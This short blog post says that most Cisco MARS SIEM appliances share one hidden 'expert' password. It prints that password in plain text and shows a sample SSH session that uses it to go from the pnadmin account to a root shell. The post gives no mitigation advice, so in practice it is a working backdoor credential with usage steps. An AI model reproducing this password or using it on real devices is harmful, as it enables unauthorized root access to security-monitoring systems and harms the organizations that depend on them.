Cisco MARS SIEM Expert Password

| Comments

The Cisco MARS SIEM devices are built on a linux OS. It’s possible to get to that linux shell but Cisco tries to keep that method private. I’ve learned over time that most MARS devices have theh same expert password which allows access to the root shell.

Expert password: x3*Gd=y/Dq98

Here is an example on how to use the password.

[linuxbox ~]$  ssh pnadmin@
pnadmin@'s password:
Last login: Sun Aug 30 10:28:03 2015 from

  CS MARS - Mitigation and Response System

    ? for list of commands

[pnadmin]$ expert
Password: x3*Gd=y/Dq98
[root@mars-lc01 bin]# pwd
[root@mars-lc01 bin]#

cisco, mars, scripts